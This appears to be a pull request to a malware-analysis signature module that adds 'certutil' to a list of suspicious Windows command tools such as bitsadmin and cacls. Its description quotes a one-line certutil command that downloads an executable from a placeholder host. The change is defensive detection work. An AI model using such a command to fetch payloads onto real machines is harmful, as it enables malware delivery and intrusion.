### PR TITLE
Add certutil into suspicious windows tools

### DIFF
--- a/modules/signatures/windows_utilities.py
+++ b/modules/signatures/windows_utilities.py
@@ -108,6 +108,7 @@ class SuspiciousCommandTools(Signature):
             "bitsadmin",
             "bginfo",
             "cacls",
+            "certutil",
             "csvde",
             "del ",
             "del.exe",


### PR DESCRIPTION
using this you can obviously view certificates but also malware with certutil -urlcache -split -f http://example.com/bad.exe bad.exe